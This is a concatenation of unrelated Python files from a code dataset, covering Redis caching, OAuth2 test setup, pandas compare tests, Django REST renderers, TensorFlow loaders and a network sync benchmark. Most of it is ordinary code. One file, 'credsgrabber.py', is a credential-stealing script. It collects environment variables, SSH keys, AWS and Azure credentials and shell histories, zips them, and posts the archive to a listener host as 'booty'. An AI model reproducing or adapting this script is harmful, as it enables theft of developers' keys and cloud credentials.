redgrease.cmd.set(url, response_data)
return response_data
# Test caching on some images
some_image_urls = [
"http://images.cocodataset.org/train2017/000000483381.jpg",
"http://images.cocodataset.org/train2017/000000237137.jpg",
"http://images.cocodataset.org/train2017/000000017267.jpg",
"http://images.cocodataset.org/train2017/000000197756.jpg",
"http://images.cocodataset.org/train2017/000000193332.jpg",
"http://images.cocodataset.org/train2017/000000475564.jpg",
"http://images.cocodataset.org/train2017/000000247368.jpg",
"http://images.cocodataset.org/train2017/000000416337.jpg",
]
# Get all the images and write them to disk
def get_em_all():
for image_url in some_image_urls:
# This will invoke the cache_get function **on the Redis server**
image_data = cache_get(image_url)
# Quick and dirty way of getting the image file name.
image_name = image_url.split("/")[-1]
# Write to file
with open(image_name, "wb") as img_file:
img_file.write(image_data.value)
# Test it
# Time how long it takes to get images when the cache is empty.
t1 = timeit.timeit(get_em_all, number=1)
print(f"Cache-miss time: {t1:.3f} seconds")
# Time how long it takes to get the images when they are all in the cache.
t2 = timeit.timeit(get_em_all, number=1)
print(f"Cache-hit time: {t2:.3f} seconds")
print(f"That is {t1/t2:.1f} times faster!")
# Clean the database
def cleanup(r: redgrease.RedisGears):
# Unregister all registrations
for reg in r.gears.dumpregistrations():
r.gears.unregister(reg.id)
# Remove all executions
for exe in r.gears.dumpexecutions():
r.gears.dropexecution(str(exe.executionId))
# Clear all keys
r.flushall()
# Check that there are no keys
return len(r.keys()) == 0
# print(cleanup(r))
|
StarcoderdataPython
|
32839
|
<reponame>fgmacedo/django-awards
from celery.task import Task
from ..notifications.contextmanagers import BatchNotifications
class AsyncBadgeAward(Task):
ignore_result = True
def run(self, badge, state, **kwargs):
# from celery.contrib import rdb; rdb.set_trace()
with BatchNotifications():
badge.actually_possibly_award(**state)
|
StarcoderdataPython
|
3268443
|
#Program to find non-repeated element
arr=list(map(int, input().split(', '))) #Input various integers in arr list
if 1< len(arr) <= 10**6: #Checking array length
for i in arr: #Taking element from arr
if 0 < i <= 10**9: #Checking element value
if arr.count(i) ==1: #Checking the number the number is unique
print(i) #Printing element
|
StarcoderdataPython
|
3399901
|
<reponame>rjczanik/xzceb-flask_eng_fr<filename>final_project/machinetranslation/tests/tests.py<gh_stars>0
import unittest
from translator import *
class TestEngToFrText(unittest.TestCase):
def test_null_value(self):
self.assertEqual(
english_to_french(None), "Please enter some text to translate..."
)
def test_valid_arguement(self):
self.assertEqual(english_to_french("Hello"), "Bonjour")
class TestFrToEngText(unittest.TestCase):
def test_null_value(self):
self.assertEqual(
french_to_english(None), "Please enter some text to translate..."
)
def test_valid_arguement(self):
self.assertEqual(english_to_french("Bonjour"), "Hello")
if __name__ == "__main__":
unittest.main()
|
StarcoderdataPython
|
3373183
|
<reponame>minddistrict/authlib
import os
import base64
import unittest
from flask import Flask, request
from authlib.common.security import generate_token
from authlib.common.encoding import to_bytes, to_unicode
from authlib.common.urls import url_encode
from authlib.integrations.sqla_oauth2 import (
create_query_client_func,
create_save_token_func,
)
from authlib.integrations.flask_oauth2 import AuthorizationServer
from authlib.oauth2 import OAuth2Error
from .models import db, User, Client, Token
def token_generator(client, grant_type, user=None, scope=None):
token = '{}-{}'.format(client.client_id[0], grant_type)
if user:
token = '{}.{}'.format(token, user.get_user_id())
return '{}.{}'.format(token, generate_token(32))
def create_authorization_server(app, lazy=False):
query_client = create_query_client_func(db.session, Client)
save_token = create_save_token_func(db.session, Token)
if lazy:
server = AuthorizationServer()
server.init_app(app, query_client, save_token)
else:
server = AuthorizationServer(app, query_client, save_token)
@app.route('/oauth/authorize', methods=['GET', 'POST'])
def authorize():
if request.method == 'GET':
user_id = request.args.get('user_id')
if user_id:
end_user = User.query.get(int(user_id))
else:
end_user = None
try:
grant = server.get_consent_grant(end_user=end_user)
return grant.prompt or 'ok'
except OAuth2Error as error:
return url_encode(error.get_body())
user_id = request.form.get('user_id')
if user_id:
grant_user = User.query.get(int(user_id))
else:
grant_user = None
return server.create_authorization_response(grant_user=grant_user)
@app.route('/oauth/token', methods=['GET', 'POST'])
def issue_token():
return server.create_token_response()
return server
def create_flask_app():
app = Flask(__name__)
app.debug = True
app.testing = True
app.secret_key = 'testing'
app.config.update({
'SQLALCHEMY_TRACK_MODIFICATIONS': False,
'SQLALCHEMY_DATABASE_URI': 'sqlite://',
'OAUTH2_ERROR_URIS': [
('invalid_client', 'https://a.b/e#invalid_client')
]
})
return app
class TestCase(unittest.TestCase):
def setUp(self):
os.environ['AUTHLIB_INSECURE_TRANSPORT'] = 'true'
app = create_flask_app()
self._ctx = app.app_context()
self._ctx.push()
db.init_app(app)
db.create_all()
self.app = app
self.client = app.test_client()
def tearDown(self):
db.drop_all()
self._ctx.pop()
os.environ.pop('AUTHLIB_INSECURE_TRANSPORT')
def create_basic_header(self, username, password):
text = '{}:{}'.format(username, password)
auth = to_unicode(base64.b64encode(to_bytes(text)))
return {'Authorization': 'Basic ' + auth}
|
StarcoderdataPython
|
3230900
|
<reponame>kishorekolli/deep_racer_guru
#
# DeepRacer Guru
#
# Version 3.0 onwards
#
# Copyright (c) 2021 dmh23
#
import math
def get_pretty_small_float(number, max_value, decimal_places):
assert 0 <= decimal_places <= 1
if max_value >= 10 and abs(round(number, decimal_places)) < 10:
prepend = " "
else:
prepend = ""
full_str = prepend + str(round(number, decimal_places))
if full_str.count(".") == 1 and decimal_places == 0:
return full_str[0:-2]
elif full_str.endswith(".0") and decimal_places == 1:
return full_str[0:-2] + " "
elif full_str.count(".") == 0 and decimal_places == 1:
return full_str + " "
else:
return full_str
def get_pretty_large_integer(number):
return "{:,}".format(round(number))
def get_pretty_hours_and_minutes(minutes: int):
show_hours = math.floor(minutes / 60)
show_mins = minutes - show_hours * 60
if show_hours < 10:
formatted_hours = "0" + str(show_hours)
else:
formatted_hours = str(show_hours)
if show_mins < 10:
formatted_mins = "0" + str(show_mins)
else:
formatted_mins = str(show_mins)
return formatted_hours + " : " + formatted_mins
def get_pretty_large_float(number):
return "{:,}".format(number)
def get_pretty_whole_percentage(number):
return str(round(number)) + " %"
|
StarcoderdataPython
|
1675680
|
<gh_stars>1-10
import os
from setuptools import setup
with open('requirements.txt') as f:
required = f.read().splitlines()
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="cronio",
version="1.2.0",
author="<NAME>",
author_email="<EMAIL>",
description="This project has a sender and a receiver, the sender sends commands through RabbitMQ on the queue of a worker (receiver), the receiver executes them either with OS or Python2.7",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/nvalerkos/cronio",
install_requires = required,
packages=setuptools.find_packages(),
classifiers=(
"Programming Language :: Python :: 2",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
),
)
|
StarcoderdataPython
|
3266391
|
<reponame>anyidea/drfexts<gh_stars>1-10
import functools
import operator
from decimal import Decimal
import orjson
from typing import Optional, Any
import unicodecsv as csv
from io import BytesIO
import datetime
from django.conf import settings
from openpyxl import Workbook
from openpyxl.styles import Font, PatternFill, Alignment
from rest_framework import status
from django.utils.encoding import force_str
from rest_framework.settings import api_settings
from rest_framework.renderers import BaseRenderer
from rest_framework.status import is_success
from django.utils.functional import Promise
from django.db.models.query import QuerySet
__all__ = ["CustomJSONRenderer", "CustomCSVRenderer", "CustomExcelRenderer"]
class CustomJSONRenderer(BaseRenderer):
"""
Renderer which serializes to JSON.
Uses the Rust-backed orjson library for serialization speed.
"""
media_type = "application/json"
html_media_type = "text/html"
format = "json"
charset = None
options = functools.reduce(
operator.or_,
api_settings.user_settings.get("ORJSON_RENDERER_OPTIONS", ()),
orjson.OPT_SERIALIZE_NUMPY | orjson.OPT_PASSTHROUGH_DATETIME,
)
@staticmethod
def default(obj: Any) -> Any:
"""
When orjson doesn't recognize an object type for serialization it passes
that object to this function which then converts the object to its
native Python equivalent.
:param obj: Object of any type to be converted.
:return: native python object
"""
if isinstance(obj, Promise):
return force_str(obj)
elif isinstance(obj, datetime.datetime):
return obj.strftime(api_settings.DATETIME_FORMAT)
elif isinstance(obj, Decimal):
if api_settings.COERCE_DECIMAL_TO_STRING:
return str(obj)
else:
return float(obj)
elif isinstance(obj, QuerySet):
return tuple(obj)
elif hasattr(obj, "tolist"):
return obj.tolist()
elif hasattr(obj, "__iter__"):
return list(item for item in obj)
def render(
self,
data: Any,
media_type: Optional[str] = None,
renderer_context: Any = None,
) -> bytes:
"""
Serializes Python objects to JSON.
:param data: The response data, as set by the Response() instantiation.
:param media_type: If provided, this is the accepted media type, of the
`Accept` HTTP header.
:param renderer_context: If provided, this is a dictionary of contextual
information provided by the view. By default this will include
the following keys: view, request, response, args, kwargs
:return: bytes() representation of the data encoded to UTF-8
"""
if response := renderer_context.get('response'):
status_code = getattr(response, 'error_code', response.status_code)
response.status_code = status.HTTP_200_OK
playload = {
"ret": status_code,
"msg": "success",
}
if data is not None:
playload["data"] = data
if not is_success(status_code):
try:
playload["msg"] = data["detail"]
playload.pop("data", None)
except Exception:
playload["msg"] = "error"
else:
playload["ret"] = status.HTTP_200_OK
elif data is None:
return b""
else:
playload = data
# If `indent` is provided in the context, then pretty print the result.
# E.g. If we're being called by RestFramework's BrowsableAPIRenderer.
options = self.options
if media_type == self.html_media_type:
options |= orjson.OPT_INDENT_2
serialized: bytes = orjson.dumps(playload, default=self.default, option=options)
return serialized
class BaseExportRenderer(BaseRenderer):
def validate(self, data: dict):
return True
def get_export_data(self, data: dict):
return data["results"] if "results" in data else data
def get_file_name(self, renderer_context: Optional[dict]):
return f'export({datetime.datetime.now().strftime("%Y%m%d")})'
def tablize(self, data, header=None, labels=None, value_mapping=None):
"""
Convert a list of data into a table.
If there is a header provided to tablize it will efficiently yield each
row as needed. If no header is provided, tablize will need to process
each row in the data in order to construct a complete header. Thus, if
you have a lot of data and want to stream it, you should probably
provide a header to the renderer (using the `header` attribute, or via
the `renderer_context`).
"""
# Try to pull the header off of the data, if it's not passed in as an
# argument.
if not header and hasattr(data, 'header'):
header = data.header
if data:
# First, flatten the data (i.e., convert it to a list of
# dictionaries that are each exactly one level deep). The key for
# each item designates the name of the column that the item will
# fall into.
data = self.flatten_data(data)
# Get the set of all unique headers, and sort them (unless already provided).
if not header:
# We don't have to materialize the data generator unless we
# have to build a header.
data = tuple(data)
header_fields = set()
for item in data:
header_fields.update(list(item.keys()))
header = sorted(header_fields)
# Return your "table", with the headers as the first row.
if labels:
yield [labels.get(x, x) for x in header]
else:
yield header
# Create a row for each dictionary, filling in columns for which the
# item has no data with None values.
for item in data:
if value_mapping:
row = [
value_mapping[key].get(item.get(key), item.get(key)) if key in value_mapping else item.get(key)
for key in header
]
else:
row = [item.get(key) for key in header]
yield row
elif header:
# If there's no data but a header was supplied, yield the header.
if labels:
yield [labels.get(x, x) for x in header]
else:
yield header
else:
# Generator will yield nothing if there's no data and no header
pass
def flatten_data(self, data, value_mapping=None):
"""
Convert the given data collection to a list of dictionaries that are
each exactly one level deep. The key for each value in the dictionaries
designates the name of the column that the value will fall into.
"""
for item in data:
yield dict(item)
class CustomCSVRenderer(BaseExportRenderer):
"""
Renderer which serializes to CSV
"""
media_type = 'text/csv'
format = 'csv'
header = None
labels = None # {'<field>':'<label>'}
writer_opts = None
data_key = "results"
def render(self, data, accepted_media_type=None, renderer_context=None):
"""
Renders serialized *data* into CSV. For a dictionary:
"""
renderer_context = renderer_context or {}
if data is None:
return bytes()
if isinstance(data, dict):
data = data[self.data_key]
writer_opts = renderer_context.get('writer_opts', self.writer_opts or {})
header = renderer_context.get('header', self.header)
labels = renderer_context.get('labels', self.labels)
value_mapping = renderer_context.get('value_mapping')
encoding = renderer_context.get('encoding', settings.DEFAULT_CHARSET)
table = self.tablize(data, header=header, labels=labels, value_mapping=value_mapping)
csv_buffer = BytesIO()
csv_writer = csv.writer(csv_buffer, encoding=encoding, **writer_opts)
for row in table:
csv_writer.writerow(row)
filename = self.get_file_name(renderer_context)
renderer_context["response"]['Content-Disposition'] = f'attachment; filename="{filename}.csv"'
return csv_buffer.getvalue()
class CustomExcelRenderer(BaseExportRenderer):
"""
Renderer for Excel spreadsheet open data format (xlsx).
"""
media_type = "application/xlsx"
format = "xlsx"
header = None
labels = None # {'<field>':'<label>'}
boolean_labels = None
custom_mappings = None
letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
data_key = "results"
header_font = Font(b=True)
header_fill = PatternFill('solid', start_color="87CEFA")
header_height = 17
freeze_header = True
def excel_style(self, row, col):
"""Convert given row and column number to an Excel-style cell name."""
result = []
while col:
col, rem = divmod(col - 1, 26)
result[:0] = self.letters[rem]
return ''.join(result) + str(row)
def render(self, data, accepted_media_type=None, renderer_context=None):
"""
Render `data` into XLSX workbook, returning a workbook.
"""
if not self.validate(data):
return bytes()
if isinstance(data, dict):
data = data[self.data_key]
header = renderer_context.get('header', self.header)
labels = renderer_context.get('labels', self.labels)
value_mapping = renderer_context.get('value_mapping')
table = self.tablize(data, header=header, labels=labels, value_mapping=value_mapping)
excel_buffer = BytesIO()
workbook = Workbook()
sheet = workbook.active
for row in table:
sheet.append(row)
for cell in sheet["1:1"]:
cell.font = self.header_font
cell.fill = self.header_fill
cell.alignment = Alignment(vertical='center')
sheet.row_dimensions[1].height = self.header_height
if self.freeze_header:
sheet.freeze_panes = f"A2"
sheet.print_title_rows = '1:1'
workbook.save(excel_buffer)
filename = self.get_file_name(renderer_context)
renderer_context["response"]['Content-Disposition'] = f'attachment; filename="{filename}.xlsx"'
return excel_buffer.getvalue()
|
StarcoderdataPython
|
1716843
|
<filename>Lesson 02/Solutions/Solution02.py<gh_stars>0
# String Repeat
#
# Get two inputs from the user
# 1. The number of times to repeat
# 2. The string to repeat
numRepeat = int(input("Enter the number of times to repeat: "))
stringRepeat = input("Enter the string to repeat: ")
# Solution 1:
for i in range(numRepeat):
print(stringRepeat, end="")
# Solution 2
res = ""
for i in range(numRepeat):
res += stringRepeat
print(res)
|
StarcoderdataPython
|
81884
|
<filename>043_face_landmark/lib/helper/init.py
import tensorflow as tf
def init(*args):
if len(args)==1:
use_pb=True
pb_path=args[0]
else:
use_pb=False
meta_path=args[0]
restore_model_path=args[1]
def ini_ckpt():
graph = tf.Graph()
graph.as_default()
configProto = tf.ConfigProto()
configProto.gpu_options.allow_growth = True
sess = tf.Session(config=configProto)
#load_model(model_path, sess)
saver = tf.train.import_meta_graph(meta_path)
saver.restore(sess, restore_model_path)
print("Model restred!")
return (graph, sess)
def init_pb(model_path):
config = tf.ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 0.2
compute_graph = tf.Graph()
compute_graph.as_default()
sess = tf.Session(config=config)
with tf.gfile.GFile(model_path, 'rb') as fid:
graph_def = tf.GraphDef()
graph_def.ParseFromString(fid.read())
tf.import_graph_def(graph_def, name='')
# saver = tf.train.Saver(tf.global_variables())
# saver.save(sess, save_path='./tmp.ckpt')
return (compute_graph, sess)
if use_pb:
model = init_pb(pb_path)
else:
model = ini_ckpt()
graph = model[0]
sess = model[1]
return graph,sess
|
StarcoderdataPython
|
1684823
|
import requests
import time
import json
import pdb
import random
import optparse
import threading
import sys
import os
def jsonPrint(r):
"""Pretty-print JSON"""
return json.dumps(r.json(), indent=4, sort_keys=True) + "\n"
def ordered(obj):
"""Order map for comparison
https://stackoverflow.com/questions/25851183/
"""
if isinstance(obj, dict):
return sorted((k, ordered(v)) for k, v in obj.items())
if isinstance(obj, list):
return sorted(ordered(x) for x in obj)
else:
return obj
def HTTPpost(endpoint, page, jsonArg="{}"):
"""Make HTTP post"""
return requests.post('http://{ip}:{port}/{page}'.format(
ip=endpoint["IP"], port=endpoint["HTTPPort"], page=page), json=jsonArg)
threads = []
def HTTPpostAsync(endpoint, page, jsonArg="{}"):
thread = threading.Thread(target=HTTPpost, args=(endpoint, page, jsonArg))
thread.start()
threads.append(thread)
# Will act as controlling node if used
masterEndpoint = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "localhost"}
usingMasterNode = False
# localhost test
# endpoint1 = {"HTTPPort": 8083, "TCPPort": 9083, "IP": "localhost"}
# endpoint2 = {"HTTPPort": 8081, "TCPPort": 9081, "IP": "localhost"}
# endpoint3 = {"HTTPPort": 8082, "TCPPort": 9082, "IP": "localhost"}
# allEndpoints = [ endpoint1, endpoint2, endpoint3]
# activeEndpoints = [ endpoint1, endpoint2, endpoint3]
# cloud test basic
# endpoint1 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "192.168.3.11"}
# endpoint2 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "192.168.3.11"}
# allEndpoints = [ endpoint1, endpoint2]
# google cloud test
endpoint1 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "192.168.3.11"}
endpoint2 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "192.168.3.11"}
endpoint3 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "172.16.31.10"}
endpoint4 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "172.16.17.32"}
# endpoint5 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "192.168.127.12"} # America
allEndpoints = [endpoint1, endpoint2, endpoint3, endpoint4]
# Endpoints that are transmitting
activeEndpoints = [
endpoint1,
endpoint2,
endpoint3,
endpoint4
]
# Global config
numberOfNodes = len(allEndpoints)
txSize = 2000 # bytes
txPerCall = 10000
txToSync = txPerCall * 15
totalSize = txToSync * numberOfNodes * txSize
print "Total size on each node after sync: ", totalSize / 1000000, " MB"
transactionSize = {"transactionSize": txSize}
transactionsPerCall = {"transactions": txPerCall}
transactionsToSync = {"transactionsToSync": txToSync}
stopCondition = {
"stopCondition": int(
txToSync /
txPerCall) *
len(activeEndpoints)}
for endpoint in allEndpoints:
HTTPpost(endpoint, 'reset')
# Set up connections to each other (circular topology)
# for i in range(len(allEndpoints)):
# if (i == len(allEndpoints)-1):
# HTTPpost(allEndpoints[i], 'add-endpoint', allEndpoints[0])
# else:
# HTTPpost(allEndpoints[i], 'add-endpoint', allEndpoints[i+1])
# Fully connected topology
for endpoint in allEndpoints:
for otherEndpoint in allEndpoints:
if(endpoint != otherEndpoint):
HTTPpost(endpoint, 'add-endpoint', otherEndpoint)
# Other setup parameters
for endpoint in allEndpoints:
HTTPpost(endpoint, 'transaction-size', transactionSize)
HTTPpost(endpoint, 'transactions-per-call', transactionsPerCall)
HTTPpost(endpoint, 'stop-condition', stopCondition)
for endpoint in activeEndpoints:
HTTPpostAsync(endpoint, 'transactions-to-sync', transactionsToSync)
# Need to make sure everyone is ready before starting
for t in threads:
t.join()
# master has all endpoints, set it up
if (usingMasterNode):
for endpoint in allEndpoints:
HTTPpost(endpoint, 'is-slave', "{}")
HTTPpost(masterEndpoint, 'add-endpoint', endpoint)
epoch_time = int(time.time())
timeWait = 3
threeSecondsTime = {"startTime": epoch_time + timeWait}
# Set up the start time
for endpoint in allEndpoints:
HTTPpostAsync(endpoint, 'start-time', threeSecondsTime)
if (usingMasterNode):
HTTPpostAsync(masterEndpoint, 'start-test-as-master', threeSecondsTime)
time.sleep(3)
# wait until they're probably done
while(True):
time.sleep(7)
hashPages = [HTTPpost(i, 'finished').json()["finished"] == True
for i in allEndpoints]
print "Finished : ", hashPages
if(sum(hashPages) == len(hashPages)):
break
# Get the time each node took to synchronise
pages = []
maxTime = 0
for endpoint in allEndpoints:
pageTemp = HTTPpost(endpoint, 'time-to-complete')
print jsonPrint(pageTemp)
if(pageTemp.json()["timeToComplete"] > maxTime):
maxTime = pageTemp.json()["timeToComplete"]
pages += pageTemp
if (usingMasterNode):
pageTemp = HTTPpost(masterEndpoint, 'time-to-complete')
print jsonPrint(pageTemp)
if(pageTemp.json()["timeToComplete"] > maxTime):
maxTime = pageTemp.json()["timeToComplete"]
pages += pageTemp
print "Max time: ", maxTime
TPS = (txToSync * numberOfNodes) / maxTime
print "Transactions per second: ", TPS
print "Transactions per second per node: ", TPS / numberOfNodes
print "Mbits/s", (TPS * txSize * 8) / 1000000
print "Mbits/s per node", (TPS * txSize * 8) / 1000000 / numberOfNodes
exit(1)
# Check that they have synchronised correctly
print "inspecting the hashes (may take a long time)"
hashPages = []
hashes = [ordered(HTTPpost(i, 'transactions-hash').json())
for i in allEndpoints]
# hashes = [1, 1]
comparison = [x == hashes[0] for x in hashes]
if(all(comparison) == False):
print "FAILED TO MATCH: "
print hashes
res = [HTTPpost(i, 'transactions').json() for i in allEndpoints]
for r in res:
for i in r:
print i
print ""
else:
print "Hashes matched!"
print hashes[0]
|
StarcoderdataPython
|
3226493
|
import numpy as np
import pytest
import pandas as pd
import pandas._testing as tm
@pytest.mark.parametrize("align_axis", [0, 1, "index", "columns"])
def test_compare_axis(align_axis):
# GH#30429
df = pd.DataFrame(
{"col1": ["a", "b", "c"], "col2": [1.0, 2.0, np.nan], "col3": [1.0, 2.0, 3.0]},
columns=["col1", "col2", "col3"],
)
df2 = df.copy()
df2.loc[0, "col1"] = "c"
df2.loc[2, "col3"] = 4.0
result = df.compare(df2, align_axis=align_axis)
if align_axis in (1, "columns"):
indices = pd.Index([0, 2])
columns = pd.MultiIndex.from_product([["col1", "col3"], ["self", "other"]])
expected = pd.DataFrame(
[["a", "c", np.nan, np.nan], [np.nan, np.nan, 3.0, 4.0]],
index=indices,
columns=columns,
)
else:
indices = pd.MultiIndex.from_product([[0, 2], ["self", "other"]])
columns = pd.Index(["col1", "col3"])
expected = pd.DataFrame(
[["a", np.nan], ["c", np.nan], [np.nan, 3.0], [np.nan, 4.0]],
index=indices,
columns=columns,
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"keep_shape, keep_equal",
[
(True, False),
(False, True),
(True, True),
# False, False case is already covered in test_compare_axis
],
)
def test_compare_various_formats(keep_shape, keep_equal):
df = pd.DataFrame(
{"col1": ["a", "b", "c"], "col2": [1.0, 2.0, np.nan], "col3": [1.0, 2.0, 3.0]},
columns=["col1", "col2", "col3"],
)
df2 = df.copy()
df2.loc[0, "col1"] = "c"
df2.loc[2, "col3"] = 4.0
result = df.compare(df2, keep_shape=keep_shape, keep_equal=keep_equal)
if keep_shape:
indices = pd.Index([0, 1, 2])
columns = pd.MultiIndex.from_product(
[["col1", "col2", "col3"], ["self", "other"]]
)
if keep_equal:
expected = pd.DataFrame(
[
["a", "c", 1.0, 1.0, 1.0, 1.0],
["b", "b", 2.0, 2.0, 2.0, 2.0],
["c", "c", np.nan, np.nan, 3.0, 4.0],
],
index=indices,
columns=columns,
)
else:
expected = pd.DataFrame(
[
["a", "c", np.nan, np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan, np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan, np.nan, 3.0, 4.0],
],
index=indices,
columns=columns,
)
else:
indices = pd.Index([0, 2])
columns = pd.MultiIndex.from_product([["col1", "col3"], ["self", "other"]])
expected = pd.DataFrame(
[["a", "c", 1.0, 1.0], ["c", "c", 3.0, 4.0]], index=indices, columns=columns
)
tm.assert_frame_equal(result, expected)
def test_compare_with_equal_nulls():
# We want to make sure two NaNs are considered the same
# and dropped where applicable
df = pd.DataFrame(
{"col1": ["a", "b", "c"], "col2": [1.0, 2.0, np.nan], "col3": [1.0, 2.0, 3.0]},
columns=["col1", "col2", "col3"],
)
df2 = df.copy()
df2.loc[0, "col1"] = "c"
result = df.compare(df2)
indices = pd.Index([0])
columns = pd.MultiIndex.from_product([["col1"], ["self", "other"]])
expected = pd.DataFrame([["a", "c"]], index=indices, columns=columns)
tm.assert_frame_equal(result, expected)
def test_compare_with_non_equal_nulls():
# We want to make sure the relevant NaNs do not get dropped
# even if the entire row or column are NaNs
df = pd.DataFrame(
{"col1": ["a", "b", "c"], "col2": [1.0, 2.0, np.nan], "col3": [1.0, 2.0, 3.0]},
columns=["col1", "col2", "col3"],
)
df2 = df.copy()
df2.loc[0, "col1"] = "c"
df2.loc[2, "col3"] = np.nan
result = df.compare(df2)
indices = pd.Index([0, 2])
columns = pd.MultiIndex.from_product([["col1", "col3"], ["self", "other"]])
expected = pd.DataFrame(
[["a", "c", np.nan, np.nan], [np.nan, np.nan, 3.0, np.nan]],
index=indices,
columns=columns,
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("align_axis", [0, 1])
def test_compare_multi_index(align_axis):
df = pd.DataFrame(
{"col1": ["a", "b", "c"], "col2": [1.0, 2.0, np.nan], "col3": [1.0, 2.0, 3.0]}
)
df.columns = pd.MultiIndex.from_arrays([["a", "a", "b"], ["col1", "col2", "col3"]])
df.index = pd.MultiIndex.from_arrays([["x", "x", "y"], [0, 1, 2]])
df2 = df.copy()
df2.iloc[0, 0] = "c"
df2.iloc[2, 2] = 4.0
result = df.compare(df2, align_axis=align_axis)
if align_axis == 0:
indices = pd.MultiIndex.from_arrays(
[["x", "x", "y", "y"], [0, 0, 2, 2], ["self", "other", "self", "other"]]
)
columns = pd.MultiIndex.from_arrays([["a", "b"], ["col1", "col3"]])
data = [["a", np.nan], ["c", np.nan], [np.nan, 3.0], [np.nan, 4.0]]
else:
indices = pd.MultiIndex.from_arrays([["x", "y"], [0, 2]])
columns = pd.MultiIndex.from_arrays(
[
["a", "a", "b", "b"],
["col1", "col1", "col3", "col3"],
["self", "other", "self", "other"],
]
)
data = [["a", "c", np.nan, np.nan], [np.nan, np.nan, 3.0, 4.0]]
expected = pd.DataFrame(data=data, index=indices, columns=columns)
tm.assert_frame_equal(result, expected)
def test_compare_unaligned_objects():
# test DataFrames with different indices
msg = "Can only compare identically-labeled DataFrame objects"
with pytest.raises(ValueError, match=msg):
df1 = pd.DataFrame([1, 2, 3], index=["a", "b", "c"])
df2 = pd.DataFrame([1, 2, 3], index=["a", "b", "d"])
df1.compare(df2)
# test DataFrames with different shapes
msg = "Can only compare identically-labeled DataFrame objects"
with pytest.raises(ValueError, match=msg):
df1 = pd.DataFrame(np.ones((3, 3)))
df2 = pd.DataFrame(np.zeros((2, 1)))
df1.compare(df2)
|
StarcoderdataPython
|
3389642
|
<filename>docs/gallery/plot_spectra_pcolormesh.py
"""
Spectrum as pcolormesh
======================
Pcolor type plot of wave spectrum
"""
import matplotlib.pyplot as plt
import cmocean
from wavespectra import read_era5
dset = read_era5("../_static/era5file.nc")
ds = dset.isel(lat=0, lon=0, time=0)
p = ds.spec.plot(kind="pcolormesh", cmap=cmocean.cm.thermal)
|
StarcoderdataPython
|
3393571
|
<filename>credsgrabber.py
import requests, os, zipfile
from zipfile import ZipFile
# interesting directories
"""
~/.ssh
~/.aws/
~/.azure/
~/Library/Application Support/Firefox/Profiles/<profilename>.default or
Also other interesting files - osx/linux will have shell stuff like .bash* files, devs may have vim stuff or database shell histories.
if in a shell environment it's good to grab the ENV vars
TODO:
- expand list as a dict or a pickle for a larger set of scrape files
"""
# grab environment variables
envs = os.environ
with open('envs_file.txt','w') as f:
f.write(str(envs))
paths = ['envs_file.txt','~/.ssh','~/.azure','~/.aws','~/.bashrc','~/.bash_profile','~/.bash_aliases','~/.bash_profile','~/.vimrc','~/.viminfo','~/.dbshell']
# create the zip
zipObj = ZipFile('test.zip', 'w')
# Populate the zip
for path in paths:
p = os.path.expanduser(path)
[zipObj.write(mypath, f) for f in listdir(p) if isfile(join(p, f))]
# Close the zip
zipObj.close()
# post the file
url = 'http://mylistener:8888'
files={"archive": ("test.zip", open('sample.zip','rb'))}
values = {'bootytype': 'ssh credentials'}
r = requests.post(url, files=files, data=values)
#
|
StarcoderdataPython
|
3208642
|
"""Defines the factory object for all the initializers"""
from torch.nn.init import kaiming_uniform_, kaiming_normal_, ones_, zeros_, \
normal_, constant_, xavier_uniform_, xavier_normal_
from coreml.factory import Factory
init_factory = Factory()
init_factory.register_builder('kaiming_uniform', kaiming_uniform_)
init_factory.register_builder('kaiming_normal', kaiming_normal_)
init_factory.register_builder('ones', ones_)
init_factory.register_builder('zeros', zeros_)
init_factory.register_builder('normal', normal_)
init_factory.register_builder('constant', constant_)
init_factory.register_builder('xavier_uniform', xavier_uniform_)
init_factory.register_builder('xavier_normal', xavier_normal_)
|
StarcoderdataPython
|
1685632
|
# -*- coding: utf-8 -*-
"""
(C) Rgc <<EMAIL>>
All rights reserved
create time '2020/7/22 14:31'
Usage:
"""
__author__ = 'Rgc'
__title__ = 'distributed_redis_sdk'
__description__ = '使用一致性hash实现python flask版的分布式redis 客户端sdk包'
__url__ = '<EMAIL>:Rgcsh/distributed_redis_sdk.git'
__version__ = '0.0.1'
__author_email__ = '<EMAIL>'
__copyright__ = 'Copyright 2020 Attractor'
|
StarcoderdataPython
|
3202475
|
<gh_stars>1-10
# -*- coding: utf-8 -*-
from multiprocessing import Process
from .message_handler import MessageHandler
class ProcessHandler:
process_list: list
output_list: list
has_web: bool = False
message_handler: MessageHandler
use_broker_process: bool = False
broker_process: Process = None
web_process: Process = None
def __init__(self, process_list, output_list, has_web, message_handler, use_broker_process):
self.process_list = process_list
self.output_list = output_list
self.has_web = has_web
self.message_handler = message_handler
self.use_broker_process = use_broker_process
def shutdown(self):
print("in shutdown...")
if self.use_broker_process and self.broker_process.is_alive():
self.broker_process.terminate()
# self.broker_process.kill()
self.broker_process.close()
print("shutdown broker")
if self.has_web and self.web_process.is_alive():
self.web_process.terminate()
# self.web_process.kill()
self.web_process.close()
print("shutdown web")
def run_broker(self, target, args, daemon=False):
self.use_broker_process = True
self.broker_process = Process(target=target, args=args, daemon=daemon)
self.broker_process.start()
def run_web(self, target, args, daemon=False):
self.has_web = True
self.web_process = Process(target=target, args=args, daemon=daemon)
self.web_process.start()
|
StarcoderdataPython
|
92246
|
<reponame>TangoMan75/pyhelper<gh_stars>0
#!/bin/python3
# -*- coding: utf-8 -*-
"""
This file is part of the TangoMan Type Validator package.
(c) "<NAME>" <<EMAIL>>
This source file is subject to the MIT license that is bundled
with this source code in the file LICENSE.
"""
from setuptools import setup
setup(
